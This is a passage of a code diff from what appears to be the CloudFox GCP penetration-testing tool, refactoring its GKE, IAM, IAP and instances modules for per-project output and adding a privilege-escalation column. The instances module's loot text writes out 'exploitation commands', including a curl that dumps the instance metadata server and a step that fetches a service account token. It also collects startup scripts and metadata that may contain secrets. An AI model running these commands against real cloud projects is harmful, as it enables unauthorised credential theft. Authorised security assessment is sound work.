"Mode", - "Private", - "MasterAuth", - "NetPolicy", - "WorkloadID", - "Shielded", - "BinAuth", - "Release Channel", - "ConfigConnector", + "Project Name", "Project ID", "Name", "Location", "Endpoint", "Status", "Version", + "Mode", "Private", "MasterAuth", "NetPolicy", "WorkloadID", "Shielded", "BinAuth", + "Release Channel", "ConfigConnector", } var clusterBody [][]string - for _, cluster := range m.Clusters { - // Cluster mode + for _, cluster := range clusters { clusterMode := "Standard" if cluster.Autopilot { clusterMode = "Autopilot" } - - // Release channel releaseChannel := cluster.ReleaseChannel if releaseChannel == "" || releaseChannel == "UNSPECIFIED" { releaseChannel = "-" } - - // Endpoint display endpoint := cluster.Endpoint if endpoint == "" { endpoint = "-" } clusterBody = append(clusterBody, []string{ - m.GetProjectName(cluster.ProjectID), - cluster.ProjectID, - cluster.Name, - cluster.Location, - endpoint, - cluster.Status, - cluster.CurrentMasterVersion, - clusterMode, - boolToYesNo(cluster.PrivateCluster), - boolToYesNo(cluster.MasterAuthorizedOnly), - boolToYesNo(cluster.NetworkPolicy), - boolToYesNo(cluster.WorkloadIdentity != ""), - boolToYesNo(cluster.ShieldedNodes), - boolToYesNo(cluster.BinaryAuthorization), - releaseChannel, - boolToYesNo(cluster.ConfigConnector), + m.GetProjectName(cluster.ProjectID), cluster.ProjectID, cluster.Name, cluster.Location, + endpoint, cluster.Status, cluster.CurrentMasterVersion, clusterMode, + boolToYesNo(cluster.PrivateCluster), boolToYesNo(cluster.MasterAuthorizedOnly), + boolToYesNo(cluster.NetworkPolicy), boolToYesNo(cluster.WorkloadIdentity != ""), + boolToYesNo(cluster.ShieldedNodes), boolToYesNo(cluster.BinaryAuthorization), + releaseChannel, boolToYesNo(cluster.ConfigConnector), + }) + } + + if len(clusterBody) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: "gke-clusters", + Header: clusterHeader, + Body: clusterBody, }) } - // Node pools table - no truncation on service account, added Cloud Platform Scope column + // Node pools table nodePoolHeader := []string{ - "Project Name", - "Project ID", - "Cluster", - "Node Pool", - "Machine Type", - "Node Count", - "Service Account", - "Cloud Platform Scope", - "Auto Upgrade", - "Secure Boot", - "Preemptible", + "Project Name", "Project ID", "Cluster", "Node Pool", "Machine Type", "Node Count", + "Service Account", "Priv Esc", "Cloud Platform Scope", "Auto Upgrade", "Secure Boot", "Preemptible", } var nodePoolBody [][]string - for _, np := range m.NodePools { - // No truncation on service account + for _, np := range nodePools { saDisplay := np.ServiceAccount if saDisplay == "" { saDisplay = "-" } - nodePoolBody = append(nodePoolBody, []string{ - m.GetProjectName(np.ProjectID), - np.ProjectID, - np.ClusterName, - np.Name, - np.MachineType, - fmt.Sprintf("%d", np.NodeCount), - saDisplay, - boolToYesNo(np.HasCloudPlatformScope), - boolToYesNo(np.AutoUpgrade), - boolToYesNo(np.SecureBoot), - boolToYesNo(np.Preemptible || np.Spot), - }) - } - - // Collect loot files - var lootFiles []internal.LootFile - for _, loot := range m.LootMap { - if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { - lootFiles = append(lootFiles, *loot) + // Check privesc for the service account + privEsc := "-" + if m.PrivescCache != nil && m.PrivescCache.IsPopulated() { + if saDisplay != "-" { + privEsc = m.PrivescCache.GetPrivescSummary(saDisplay) + } else { + privEsc = "No" + } } - } - // Build table files - only 2 tables now - tableFiles := []internal.TableFile{} - - if len(clusterBody) > 0 { - tableFiles = append(tableFiles, internal.TableFile{ - Name: "gke-clusters", - Header: clusterHeader, - Body: clusterBody, + nodePoolBody = append(nodePoolBody, []string{ + m.GetProjectName(np.ProjectID), np.ProjectID, np.ClusterName, np.Name, + np.MachineType, fmt.Sprintf("%d", np.NodeCount), saDisplay, privEsc, + boolToYesNo(np.HasCloudPlatformScope), boolToYesNo(np.AutoUpgrade), + boolToYesNo(np.SecureBoot), boolToYesNo(np.Preemptible || np.Spot), }) } @@ -313,30 +409,5 @@ func (m *GKEModule) writeOutput(ctx context.Context, logger internal.Logger) { }) } - output := GKEOutput{ - Table: tableFiles, - Loot: lootFiles, - } - - scopeNames := make([]string, len(m.ProjectIDs)) - for i, id := range m.ProjectIDs { - scopeNames[i] = m.GetProjectName(id) - } - - err := internal.HandleOutputSmart( - "gcp", - m.Format, - m.OutputDirectory, - m.Verbosity, - m.WrapTable, - "project", - m.ProjectIDs, - scopeNames, - m.Account, - output, - ) - if err != nil { - logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_GKE_MODULE_NAME) - m.CommandCounter.Error++ - } + return tableFiles } diff --git a/gcp/commands/iam.go b/gcp/commands/iam.go index 3d8d8bc6..822baddd 100644 --- a/gcp/commands/iam.go +++ b/gcp/commands/iam.go @@ -460,6 +460,14 @@ func formatCondition(condInfo *IAMService.IAMCondition) string { // Output Generation // ------------------------------ func (m *IAMModule) writeOutput(ctx context.Context, logger internal.Logger) { + if m.Hierarchy != nil && !m.FlatOutput { + m.writeHierarchicalOutput(ctx, logger) + } else { + m.writeFlatOutput(ctx, logger) + } +} + +func (m *IAMModule) buildTables() []internal.TableFile { // New table structure with Scope Type/ID/Name header := []string{ "Scope Type", @@ -478,16 +486,12 @@ func (m *IAMModule) writeOutput(ctx context.Context, logger internal.Logger) { } var body [][]string - publicAccessFound := false - saWithKeys := 0 - highPrivCount := 0 // Add scope bindings (one row per binding) for _, sb := range m.ScopeBindings { isHighPriv := "No" if highPrivilegeRoles[sb.Role] { isHighPriv = "Yes" - highPrivCount++ } isCustom := "No" @@ -501,11 +505,6 @@ func (m *IAMModule) writeOutput(ctx context.Context, logger internal.Logger) { condition = formatCondition(sb.ConditionInfo) } - // Check for public access - if sb.MemberType == "PUBLIC" || sb.MemberType == "ALL_AUTHENTICATED" { - publicAccessFound = true - } - // Get MFA status mfa := "-" if sb.MemberType == "User" { @@ -553,7 +552,6 @@ func (m *IAMModule) writeOutput(ctx context.Context, logger internal.Logger) { hasKeys := "No" if sa.HasKeys { hasKeys = "Yes" - saWithKeys++ } disabled := "" @@ -608,22 +606,253 @@ func (m *IAMModule) writeOutput(ctx context.Context, logger internal.Logger) { }) } - // Collect loot files + // Build tables + tables := []internal.TableFile{ + { + Name: "iam", + Header: header, + Body: body, + }, + } + + return tables +} + +func (m *IAMModule) collectLootFiles() []internal.LootFile { var lootFiles []internal.LootFile for _, loot := range m.LootMap { if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { lootFiles = append(lootFiles, *loot) } } + return lootFiles +} + +func (m *IAMModule) writeHierarchicalOutput(ctx context.Context, logger internal.Logger) { + outputData := internal.HierarchicalOutputData{ + OrgLevelData: make(map[string]internal.CloudfoxOutput), + ProjectLevelData: make(map[string]internal.CloudfoxOutput), + } + + // Determine org ID - prefer discovered orgs, fall back to hierarchy + orgID := "" + if len(m.OrgIDs) > 0 { + orgID = m.OrgIDs[0] + } else if m.Hierarchy != nil && len(m.Hierarchy.Organizations) > 0 { + orgID = m.Hierarchy.Organizations[0].ID + } + + if orgID != "" { + // DUAL OUTPUT: Complete aggregated output at org level + tables := m.buildTables() + lootFiles := m.collectLootFiles() + outputData.OrgLevelData[orgID] = IAMOutput{Table: tables, Loot: lootFiles} + + // DUAL OUTPUT: Filtered per-project output + for _, projectID := range m.ProjectIDs { + projectTables := m.buildTablesForProject(projectID) + if len(projectTables) > 0 && len(projectTables[0].Body) > 0 { + outputData.ProjectLevelData[projectID] = IAMOutput{Table: projectTables, Loot: nil} + } + } + } else if len(m.ProjectIDs) > 0 { + // FALLBACK: No org discovered, output complete data to first project + tables := m.buildTables() + lootFiles := m.collectLootFiles() + outputData.ProjectLevelData[m.ProjectIDs[0]] = IAMOutput{Table: tables, Loot: lootFiles} + } - // Build tables - tables := []internal.TableFile{ + pathBuilder := m.BuildPathBuilder() + + err := internal.HandleHierarchicalOutputSmart("gcp", m.Format, m.Verbosity, m.WrapTable, pathBuilder, outputData) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing hierarchical output: %v", err), globals.GCP_IAM_MODULE_NAME) + m.CommandCounter.Error++ + } +} + +// buildTablesForProject builds tables filtered to only include data for a specific project +func (m *IAMModule) buildTablesForProject(projectID string) []internal.TableFile { + header := []string{ + "Scope Type", + "Scope ID", + "Scope Name", + "Member Type", + "Member", + "Role", + "High Privilege", + "Custom Role", + "Has Keys", + "Condition", + "MFA", + "Groups", + "Federated", + } + + var body [][]string + + // Add scope bindings for this project only + for _, sb := range m.ScopeBindings { + if sb.ScopeType != "project" || sb.ScopeID != projectID { + continue + } + + isHighPriv := "No" + if highPrivilegeRoles[sb.Role] { + isHighPriv = "Yes" + } + + isCustom := "No" + if sb.IsCustom { + isCustom = "Yes" + } + + condition := "No" + if sb.HasCondition { + condition = formatCondition(sb.ConditionInfo) + } + + mfa := "-" + if sb.MemberType == "User" { + if status, ok := m.MFAStatus[sb.MemberEmail]; ok { + if status.Error != "" { + mfa = "Unknown" + } else if status.HasMFA { + mfa = "Yes" + } else { + mfa = "No" + } + } + } else if sb.MemberType == "ServiceAccount" { + mfa = "N/A" + } + + groups := "-" + if memberGroups, ok := m.MemberToGroups[sb.MemberEmail]; ok && len(memberGroups) > 0 { + groups = strings.Join(memberGroups, ", ") + } + + federated := formatFederatedInfo(parseFederatedIdentity(sb.MemberEmail)) + + body = append(body, []string{ + sb.ScopeType, + sb.ScopeID, + sb.ScopeName, + sb.MemberType, + sb.MemberEmail, + sb.Role, + isHighPriv, + isCustom, + "-", + condition, + mfa, + groups, + federated, + }) + } + + // Add service accounts for this project only + for _, sa := range m.ServiceAccounts { + if sa.ProjectID != projectID { + continue + } + + hasKeys := "No" + if sa.HasKeys { + hasKeys = "Yes" + } + + disabled := "" + if sa.Disabled { + disabled = " (disabled)" + } + + groups := "-" + if memberGroups, ok := m.MemberToGroups[sa.Email]; ok && len(memberGroups) > 0 { + groups = strings.Join(memberGroups, ", ") + } + + body = append(body, []string{ + "project", + sa.ProjectID, + m.GetProjectName(sa.ProjectID), + "ServiceAccountInfo", + sa.Email + disabled, + sa.DisplayName, + "-", + "-", + hasKeys, + "-", + "N/A", + groups, + "-", + }) + } + + // Add custom roles for this project only + for _, role := range m.CustomRoles { + if role.ProjectID != projectID { + continue + } + + deleted := "" + if role.Deleted { + deleted = " (deleted)" + } + + body = append(body, []string{ + "project", + role.ProjectID, + m.GetProjectName(role.ProjectID), + "CustomRole", + extractRoleName(role.Name) + deleted, + fmt.Sprintf("%s (%d permissions)", role.Title, role.PermissionCount), + "-", + "Yes", + "-", + "-", + "-", + "-", + "-", + }) + } + + if len(body) == 0 { + return nil + } + + return []internal.TableFile{ { Name: "iam", Header: header, Body: body, }, } +} + +func (m *IAMModule) writeFlatOutput(ctx context.Context, logger internal.Logger) { + tables := m.buildTables() + lootFiles := m.collectLootFiles() + + // Count security findings for logging + publicAccessFound := false + saWithKeys := 0 + highPrivCount := 0 + + for _, sb := range m.ScopeBindings { + if highPrivilegeRoles[sb.Role] { + highPrivCount++ + } + if sb.MemberType == "PUBLIC" || sb.MemberType == "ALL_AUTHENTICATED" { + publicAccessFound = true + } + } + + for _, sa := range m.ServiceAccounts { + if sa.HasKeys { + saWithKeys++ + } + } // Log warnings for security findings if publicAccessFound { diff --git a/gcp/commands/iap.go b/gcp/commands/iap.go index 2d33a1fe..9ad9a27a 100644 --- a/gcp/commands/iap.go +++ b/gcp/commands/iap.go @@ -29,9 +29,9 @@ Features: type IAPModule struct { gcpinternal.BaseGCPModule - TunnelDestGroups []iapservice.TunnelDestGroup - LootMap map[string]*internal.LootFile - mu sync.Mutex + ProjectTunnelDestGroups map[string][]iapservice.TunnelDestGroup // projectID -> groups + LootMap map[string]map[string]*internal.LootFile // projectID -> loot files + mu sync.Mutex } type IAPOutput struct { @@ -49,24 +49,32 @@ func runGCPIAPCommand(cmd *cobra.Command, args []string) { } module := &IAPModule{ - BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), - TunnelDestGroups: []iapservice.TunnelDestGroup{}, - LootMap: make(map[string]*internal.LootFile), + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + ProjectTunnelDestGroups: make(map[string][]iapservice.TunnelDestGroup), + LootMap: make(map[string]map[string]*internal.LootFile), } - module.initializeLootFiles() module.Execute(cmdCtx.Ctx, cmdCtx.Logger) } +func (m *IAPModule) getAllTunnelDestGroups() []iapservice.TunnelDestGroup { + var all []iapservice.TunnelDestGroup + for _, groups := range m.ProjectTunnelDestGroups { + all = append(all, groups...) + } + return all +} + func (m *IAPModule) Execute(ctx context.Context, logger internal.Logger) { m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_IAP_MODULE_NAME, m.processProject) - if len(m.TunnelDestGroups) == 0 { + allGroups := m.getAllTunnelDestGroups() + if len(allGroups) == 0 { logger.InfoM("No IAP tunnel destination groups found", globals.GCP_IAP_MODULE_NAME) return } logger.SuccessM(fmt.Sprintf("Found %d IAP tunnel destination group(s)", - len(m.TunnelDestGroups)), globals.GCP_IAP_MODULE_NAME) + len(allGroups)), globals.GCP_IAP_MODULE_NAME) m.writeOutput(ctx, logger) } @@ -75,6 +83,17 @@ func (m *IAPModule) processProject(ctx context.Context, projectID string, logger logger.InfoM(fmt.Sprintf("Enumerating IAP in project: %s", projectID), globals.GCP_IAP_MODULE_NAME) } + m.mu.Lock() + // Initialize loot for this project + if m.LootMap[projectID] == nil { + m.LootMap[projectID] = make(map[string]*internal.LootFile) + m.LootMap[projectID]["iap-commands"] = &internal.LootFile{ + Name: "iap-commands", + Contents: "# IAP Commands\n# Generated by CloudFox\n\n", + } + } + m.mu.Unlock() + svc := iapservice.New() // Get tunnel destination groups @@ -85,23 +104,20 @@ func (m *IAPModule) processProject(ctx context.Context, projectID string, logger fmt.Sprintf("Could not enumerate IAP tunnel groups in project %s", projectID)) } else { m.mu.Lock() - m.TunnelDestGroups = append(m.TunnelDestGroups, groups...) + m.ProjectTunnelDestGroups[projectID] = groups for _, group := range groups { - m.addToLoot(group) + m.addToLoot(projectID, group) } m.mu.Unlock() } } -func (m *IAPModule) initializeLootFiles() { - m.LootMap["iap-commands"] = &internal.LootFile{ - Name: "iap-commands", - Contents: "# IAP Commands\n# Generated by CloudFox\n\n", +func (m *IAPModule) addToLoot(projectID string, group iapservice.TunnelDestGroup) { + lootFile := m.LootMap[projectID]["iap-commands"] + if lootFile == nil { + return } -} - -func (m *IAPModule) addToLoot(group iapservice.TunnelDestGroup) { - m.LootMap["iap-commands"].Contents += fmt.Sprintf( + lootFile.Contents += fmt.Sprintf( "## Tunnel Destination Group: %s (Project: %s, Region: %s)\n"+ "# CIDRs: %s\n"+ "# FQDNs: %s\n\n"+ @@ -118,23 +134,29 @@ func (m *IAPModule) addToLoot(group iapservice.TunnelDestGroup) { } func (m *IAPModule) writeOutput(ctx context.Context, logger internal.Logger) { - var tables []internal.TableFile + if m.Hierarchy != nil && !m.FlatOutput { + m.writeHierarchicalOutput(ctx, logger) + } else { + m.writeFlatOutput(ctx, logger) + } +} - // Tunnel Destination Groups table with one row per IAM binding - header := []string{ +func (m *IAPModule) getHeader() []string { + return []string{ "Project Name", "Project ID", "Name", "Region", "CIDRs", "FQDNs", - "IAM Role", - "IAM Member", + "Resource Role", + "Resource Principal", } +} +func (m *IAPModule) groupsToTableBody(groups []iapservice.TunnelDestGroup) [][]string { var body [][]string - for _, group := range m.TunnelDestGroups { - // No truncation - show full content + for _, group := range groups { cidrs := strings.Join(group.CIDRs, ", ") if cidrs == "" { cidrs = "-" @@ -144,7 +166,6 @@ func (m *IAPModule) writeOutput(ctx context.Context, logger internal.Logger) { fqdns = "-" } - // If group has IAM bindings, create one row per binding if len(group.IAMBindings) > 0 { for _, binding := range group.IAMBindings { body = append(body, []string{ @@ -159,7 +180,6 @@ func (m *IAPModule) writeOutput(ctx context.Context, logger internal.Logger) { }) } } else { - // No IAM bindings - single row body = append(body, []string{ m.GetProjectName(group.ProjectID), group.ProjectID, @@ -172,19 +192,71 @@ func (m *IAPModule) writeOutput(ctx context.Context, logger internal.Logger) { }) } } + return body +} + +func (m *IAPModule) buildTablesForProject(projectID string) []internal.TableFile { + var tableFiles []internal.TableFile + + if groups, ok := m.ProjectTunnelDestGroups[projectID]; ok && len(groups) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: "iap-tunnel-groups", + Header: m.getHeader(), + Body: m.groupsToTableBody(groups), + }) + } - if len(body) > 0 { + return tableFiles +} + +func (m *IAPModule) writeHierarchicalOutput(ctx context.Context, logger internal.Logger) { + outputData := internal.HierarchicalOutputData{ + OrgLevelData: make(map[string]internal.CloudfoxOutput), + ProjectLevelData: make(map[string]internal.CloudfoxOutput), + } + + for projectID := range m.ProjectTunnelDestGroups { + tableFiles := m.buildTablesForProject(projectID) + + var lootFiles []internal.LootFile + if projectLoot, ok := m.LootMap[projectID]; ok { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + } + + outputData.ProjectLevelData[projectID] = IAPOutput{Table: tableFiles, Loot: lootFiles} + } + + pathBuilder := m.BuildPathBuilder() + + err := internal.HandleHierarchicalOutputSmart("gcp", m.Format, m.Verbosity, m.WrapTable, pathBuilder, outputData) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing hierarchical output: %v", err), globals.GCP_IAP_MODULE_NAME) + } +} + +func (m *IAPModule) writeFlatOutput(ctx context.Context, logger internal.Logger) { + allGroups := m.getAllTunnelDestGroups() + + var tables []internal.TableFile + + if len(allGroups) > 0 { tables = append(tables, internal.TableFile{ Name: "iap-tunnel-groups", - Header: header, - Body: body, + Header: m.getHeader(), + Body: m.groupsToTableBody(allGroups), }) } var lootFiles []internal.LootFile - for _, loot := range m.LootMap { - if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { - lootFiles = append(lootFiles, *loot) + for _, projectLoot := range m.LootMap { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { + lootFiles = append(lootFiles, *loot) + } } } diff --git a/gcp/commands/instances.go b/gcp/commands/instances.go index af9d81b6..acd53386 100644 --- a/gcp/commands/instances.go +++ b/gcp/commands/instances.go @@ -51,11 +51,12 @@ Security Columns: type InstancesModule struct { gcpinternal.BaseGCPModule - // Module-specific fields - Instances []ComputeEngineService.ComputeEngineInfo - ProjectMetadata map[string]*ComputeEngineService.ProjectMetadataInfo // projectID -> metadata - LootMap map[string]*internal.LootFile - mu sync.Mutex + // Module-specific fields - per-project for hierarchical output + ProjectInstances map[string][]ComputeEngineService.ComputeEngineInfo // projectID -> instances + ProjectMetadata map[string]*ComputeEngineService.ProjectMetadataInfo // projectID -> metadata + LootMap map[string]map[string]*internal.LootFile // projectID -> loot files + PrivescCache *gcpinternal.PrivescCache // Cached privesc analysis results + mu sync.Mutex } // ------------------------------ @@ -81,15 +82,12 @@ func runGCPInstancesCommand(cmd *cobra.Command, args []string) { // Create module instance module := &InstancesModule{ - BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), - Instances: []ComputeEngineService.ComputeEngineInfo{}, - ProjectMetadata: make(map[string]*ComputeEngineService.ProjectMetadataInfo), - LootMap: make(map[string]*internal.LootFile), + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + ProjectInstances: make(map[string][]ComputeEngineService.ComputeEngineInfo), + ProjectMetadata: make(map[string]*ComputeEngineService.ProjectMetadataInfo), + LootMap: make(map[string]map[string]*internal.LootFile), } - // Initialize loot files - module.initializeLootFiles() - // Execute enumeration module.Execute(cmdCtx.Ctx, cmdCtx.Logger) } @@ -98,21 +96,34 @@ func runGCPInstancesCommand(cmd *cobra.Command, args []string) { // Module Execution // ------------------------------ func (m *InstancesModule) Execute(ctx context.Context, logger internal.Logger) { + // Get privesc cache from context (populated by --with-privesc flag or all-checks) + m.PrivescCache = gcpinternal.GetPrivescCacheFromContext(ctx) + // Run enumeration with concurrency m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_INSTANCES_MODULE_NAME, m.processProject) - // Check results - if len(m.Instances) == 0 { + // Get all instances for stats + allInstances := m.getAllInstances() + if len(allInstances) == 0 { logger.InfoM("No instances found", globals.GCP_INSTANCES_MODULE_NAME) return } - logger.SuccessM(fmt.Sprintf("Found %d instance(s)", len(m.Instances)), globals.GCP_INSTANCES_MODULE_NAME) + logger.SuccessM(fmt.Sprintf("Found %d instance(s)", len(allInstances)), globals.GCP_INSTANCES_MODULE_NAME) // Write output m.writeOutput(ctx, logger) } +// getAllInstances returns all instances from all projects (for statistics) +func (m *InstancesModule) getAllInstances() []ComputeEngineService.ComputeEngineInfo { + var all []ComputeEngineService.ComputeEngineInfo + for _, instances := range m.ProjectInstances { + all = append(all, instances...) + } + return all +} + // ------------------------------ // Project Processor (called concurrently for each project) // ------------------------------ @@ -131,18 +142,27 @@ func (m *InstancesModule) processProject(ctx context.Context, projectID string, return } - // Thread-safe append + // Thread-safe store per-project m.mu.Lock() - m.Instances = append(m.Instances, instances...) + m.ProjectInstances[projectID] = instances m.ProjectMetadata[projectID] = projectMeta + // Initialize loot for this project + if m.LootMap[projectID] == nil { + m.LootMap[projectID] = make(map[string]*internal.LootFile) + m.LootMap[projectID]["instances-commands"] = &internal.LootFile{ + Name: "instances-commands", + Contents: "# GCP Compute Engine Instance Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + } + } + // Generate loot for each instance for _, instance := range instances { - m.addInstanceToLoot(instance) + m.addInstanceToLoot(projectID, instance) } // Add project metadata to loot - m.addProjectMetadataToLoot(projectMeta) + m.addProjectMetadataToLoot(projectID, projectMeta) m.mu.Unlock() if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { @@ -153,19 +173,17 @@ func (m *InstancesModule) processProject(ctx context.Context, projectID string, // ------------------------------ // Loot File Management // ------------------------------ -func (m *InstancesModule) initializeLootFiles() { - m.LootMap["instances-commands"] = &internal.LootFile{ - Name: "instances-commands", - Contents: "# GCP Compute Engine Instance Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", +func (m *InstancesModule) addProjectMetadataToLoot(projectID string, meta *ComputeEngineService.ProjectMetadataInfo) { + if meta == nil { + return } -} -func (m *InstancesModule) addProjectMetadataToLoot(meta *ComputeEngineService.ProjectMetadataInfo) { - if meta == nil { + lootFile := m.LootMap[projectID]["instances-commands"] + if lootFile == nil { return } - m.LootMap["instances-commands"].Contents += fmt.Sprintf( + lootFile.Contents += fmt.Sprintf( "# ==========================================\n"+ "# PROJECT-LEVEL METADATA (Project: %s)\n"+ "# ==========================================\n"+ @@ -175,18 +193,18 @@ func (m *InstancesModule) addProjectMetadataToLoot(meta *ComputeEngineService.Pr // Project-level SSH keys if meta.HasProjectSSHKeys && len(meta.ProjectSSHKeys) > 0 { - m.LootMap["instances-commands"].Contents += fmt.Sprintf( + lootFile.Contents += fmt.Sprintf( "# Project SSH Keys: %d (apply to ALL instances not blocking project keys)\n", len(meta.ProjectSSHKeys), ) for _, key := range meta.ProjectSSHKeys { - m.LootMap["instances-commands"].Contents += fmt.Sprintf("# %s\n", key) + lootFile.Contents += fmt.Sprintf("# %s\n", key) } } // Project-level startup script if meta.HasProjectStartupScript && meta.ProjectStartupScript != "" { - m.LootMap["instances-commands"].Contents += fmt.Sprintf( + lootFile.Contents += fmt.Sprintf( "#\n# PROJECT STARTUP SCRIPT (runs on ALL instances):\n"+ "# ------- BEGIN -------\n"+ "%s\n"+ @@ -197,20 +215,24 @@ func (m *InstancesModule) addProjectMetadataToLoot(meta *ComputeEngineService.Pr // Custom metadata keys at project level if len(meta.CustomMetadataKeys) > 0 { - m.LootMap["instances-commands"].Contents += "# Custom metadata keys (may contain secrets):\n" + lootFile.Contents += "# Custom metadata keys (may contain secrets):\n" for _, key := range meta.CustomMetadataKeys { - m.LootMap["instances-commands"].Contents += fmt.Sprintf("# - %s\n", key) + lootFile.Contents += fmt.Sprintf("# - %s\n", key) } } - m.LootMap["instances-commands"].Contents += fmt.Sprintf( + lootFile.Contents += fmt.Sprintf( "\n# Get project metadata:\n"+ "gcloud compute project-info describe --project=%s --format='yaml(commonInstanceMetadata)'\n\n", meta.ProjectID, ) } -func (m *InstancesModule) addInstanceToLoot(instance ComputeEngineService.ComputeEngineInfo) { +func (m *InstancesModule) addInstanceToLoot(projectID string, instance ComputeEngineService.ComputeEngineInfo) { + lootFile := m.LootMap[projectID]["instances-commands"] + if lootFile == nil { + return + } // Build service account string var saEmails []string for _, sa := range instance.ServiceAccounts { @@ -227,7 +249,7 @@ func (m *InstancesModule) addInstanceToLoot(instance ComputeEngineService.Comput externalIP = "None" } - m.LootMap["instances-commands"].Contents += fmt.Sprintf( + lootFile.Contents += fmt.Sprintf( "# ==========================================\n"+ "# INSTANCE: %s (Project: %s, Zone: %s)\n"+ "# ==========================================\n"+ @@ -248,15 +270,15 @@ func (m *InstancesModule) addInstanceToLoot(instance ComputeEngineService.Comput // SSH keys on this instance if len(instance.SSHKeys) > 0 { - m.LootMap["instances-commands"].Contents += fmt.Sprintf("# Instance SSH Keys: %d\n", len(instance.SSHKeys)) + lootFile.Contents += fmt.Sprintf("# Instance SSH Keys: %d\n", len(instance.SSHKeys)) for _, key := range instance.SSHKeys { - m.LootMap["instances-commands"].Contents += fmt.Sprintf("# %s\n", key) + lootFile.Contents += fmt.Sprintf("# %s\n", key) } } // Startup script content if instance.StartupScriptContent != "" { - m.LootMap["instances-commands"].Contents += fmt.Sprintf( + lootFile.Contents += fmt.Sprintf( "#\n# STARTUP SCRIPT (may contain secrets):\n"+ "# ------- BEGIN -------\n"+ "%s\n"+ @@ -265,7 +287,7 @@ func (m *InstancesModule) addInstanceToLoot(instance ComputeEngineService.Comput ) } if instance.StartupScriptURL != "" { - m.LootMap["instances-commands"].Contents += fmt.Sprintf( + lootFile.Contents += fmt.Sprintf( "# Startup Script URL: %s\n"+ "# Fetch with: gsutil cat %s\n", instance.StartupScriptURL, instance.StartupScriptURL, @@ -274,14 +296,14 @@ func (m *InstancesModule) addInstanceToLoot(instance ComputeEngineService.Comput // Custom metadata keys if len(instance.CustomMetadata) > 0 { - m.LootMap["instances-commands"].Contents += "# Custom metadata keys (may contain secrets):\n" + lootFile.Contents += "# Custom metadata keys (may contain secrets):\n" for _, key := range instance.CustomMetadata { - m.LootMap["instances-commands"].Contents += fmt.Sprintf("# - %s\n", key) + lootFile.Contents += fmt.Sprintf("# - %s\n", key) } } // Commands section - m.LootMap["instances-commands"].Contents += fmt.Sprintf( + lootFile.Contents += fmt.Sprintf( "\n# Describe instance:\n"+ "gcloud compute instances describe %s --zone=%s --project=%s\n"+ "# Get IAM policy:\n"+ @@ -298,7 +320,7 @@ func (m *InstancesModule) addInstanceToLoot(instance ComputeEngineService.Comput // SSH commands if instance.ExternalIP != "" { - m.LootMap["instances-commands"].Contents += fmt.Sprintf( + lootFile.Contents += fmt.Sprintf( "# SSH (external IP):\n"+ "gcloud compute ssh %s --zone=%s --project=%s\n"+ "# Direct SSH (if OS Login disabled):\n"+ @@ -307,7 +329,7 @@ func (m *InstancesModule) addInstanceToLoot(instance ComputeEngineService.Comput instance.ExternalIP, ) } else { - m.LootMap["instances-commands"].Contents += fmt.Sprintf( + lootFile.Contents += fmt.Sprintf( "# SSH via IAP tunnel (no external IP):\n"+ "gcloud compute ssh %s --zone=%s --project=%s --tunnel-through-iap\n", instance.Name, instance.Zone, instance.ProjectID, @@ -315,7 +337,7 @@ func (m *InstancesModule) addInstanceToLoot(instance ComputeEngineService.Comput } // Exploitation commands - m.LootMap["instances-commands"].Contents += fmt.Sprintf( + lootFile.Contents += fmt.Sprintf( "# Metadata from inside instance:\n"+ "curl -H \"Metadata-Flavor: Google\" http://169.254.169.254/computeMetadata/v1/?recursive=true\n"+ "# Get service account token:\n"+ @@ -381,8 +403,146 @@ func parseSSHKeyLine(line string) SSHKeyParts { // Output Generation // ------------------------------ func (m *InstancesModule) writeOutput(ctx context.Context, logger internal.Logger) { - // Single combined table with all security-relevant columns and IAM bindings - header := []string{ + // Decide between hierarchical and flat output + if m.Hierarchy != nil && !m.FlatOutput { + m.writeHierarchicalOutput(ctx, logger) + } else { + m.writeFlatOutput(ctx, logger) + } +} + +// writeHierarchicalOutput writes output to per-project directories +func (m *InstancesModule) writeHierarchicalOutput(ctx context.Context, logger internal.Logger) { + header := m.getInstancesTableHeader() + sshKeysHeader := m.getSSHKeysTableHeader() + + // Build hierarchical output data + outputData := internal.HierarchicalOutputData{ + OrgLevelData: make(map[string]internal.CloudfoxOutput), + ProjectLevelData: make(map[string]internal.CloudfoxOutput), + } + + // Build project-level outputs + for projectID, instances := range m.ProjectInstances { + body := m.instancesToTableBody(instances) + tables := []internal.TableFile{{ + Name: globals.GCP_INSTANCES_MODULE_NAME, + Header: header, + Body: body, + }} + + // Build SSH keys table for this project + sshKeysBody := m.buildSSHKeysTableForProject(projectID, instances) + if len(sshKeysBody) > 0 { + tables = append(tables, internal.TableFile{ + Name: "instances-ssh-keys", + Header: sshKeysHeader, + Body: sshKeysBody, + }) + } + + // Collect loot for this project + var lootFiles []internal.LootFile + if projectLoot, ok := m.LootMap[projectID]; ok { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + } + + outputData.ProjectLevelData[projectID] = InstancesOutput{Table: tables, Loot: lootFiles} + } + + // Create path builder using the module's hierarchy + pathBuilder := m.BuildPathBuilder() + + // Write using hierarchical output + err := 